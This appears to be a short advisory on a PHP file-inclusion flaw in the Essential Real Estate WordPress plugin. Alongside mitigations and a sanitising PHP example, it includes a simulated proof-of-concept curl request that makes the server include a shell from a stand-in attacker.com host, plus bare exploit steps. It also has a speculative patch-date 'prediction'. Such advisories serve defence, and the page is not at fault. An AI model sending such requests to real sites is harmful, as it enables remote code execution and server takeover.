How the CVE Works
The vulnerability arises from improper sanitization of user-supplied input passed to PHP file inclusion functions (`include`, `require`) in g5theme Essential Real Estate. An attacker can manipulate file paths to include arbitrary local or remote PHP files, leading to remote code execution (RCE). By crafting a malicious request with a manipulated filename parameter, the attacker forces the server to execute PHP code from an external source or to include sensitive local files (e.g., `/etc/passwd`). The exploit is possible because dynamic file inclusion paths are insufficiently validated in versions up to 5.2.1.
DailyCVE Form
Platform: g5theme Essential Real Estate
Version: ≤ 5.2.1
Vulnerability: PHP LFI/RFI
Severity: Critical
Date: 07/02/2025
Prediction: Patch by 08/15/2025
What Undercode Say
```bash
# Check vulnerable versions (--fields takes the comma-separated column list)
wp plugin list --fields=name,version | grep "essential-real-estate"

# Exploit PoC (simulated)
curl -X GET "http://target/wp-content/plugins/essential-real-estate/includes/file.php?path=http://attacker.com/shell.txt"

# Mitigation command (temporary)
chmod -R 750 /wp-content/plugins/essential-real-estate/
```
How Exploit
- Craft HTTP request with malicious `path` parameter.
- Force inclusion of remote PHP shell.
- Gain RCE via uploaded web shell.
Protection from this CVE
- Update to patched version post-5.2.1.
- Disable remote file includes (`allow_url_include=Off`).
- Implement input sanitization for file operations.
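The input-sanitization step above, as an added example that is not code from the plugin or from the original page: the request value only selects an allowlisted template name, and the resolved file must stay inside a base directory. `ALLOWED_TEMPLATES`, `resolve_template()` and the temporary directory are hypothetical names and constructed sample data.

```php
<?php
declare(strict_types=1);

// Added example with hypothetical names; not Essential Real Estate's code.
const ALLOWED_TEMPLATES = ['listing', 'agent', 'search']; // constructed allowlist

// Illustrative pattern of the kind the advisory describes: include $_GET['path'];

/** Map a request value to a file inside $baseDir, or null if rejected. */
function resolve_template(string $requested, string $baseDir): ?string
{
    // 1. Allowlist: the request selects a name, never a path or URL.
    if (!in_array($requested, ALLOWED_TEMPLATES, true)) {
        return null;
    }
    // 2. Canonicalise and confirm the file is still inside the base directory
    //    (guards against symlinks and a bad allowlist entry).
    $base = realpath($baseDir);
    $file = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $file === false) {
        return null;
    }
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Self-check with constructed inputs in a temporary directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'listing.php', "<?php echo 'listing';");

$cases = [
    'listing'                      => true,  // allowlisted and present
    'agent'                        => false, // allowlisted but file missing
    '../../../../etc/passwd'       => false, // local path traversal
    'http://example.invalid/x.txt' => false, // remote URL
    "listing\0.txt"                => false, // NUL byte suffix
];
foreach ($cases as $input => $expectOk) {
    $ok = resolve_template((string) $input, $dir) !== null;
    printf("%-34s %s\n", json_encode($input), $ok === $expectOk ? 'as expected' : 'UNEXPECTED');
}
unlink($dir . DIRECTORY_SEPARATOR . 'listing.php');
rmdir($dir);
```

A caller would pass the request parameter to `resolve_template()` and `include` only a non-null result, returning an error response otherwise.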
Impact
- Full server compromise.
- Data leakage (e.g., database credentials).
- Unauthorized plugin/modification.
Sources:
Reported By: nvd.nist.gov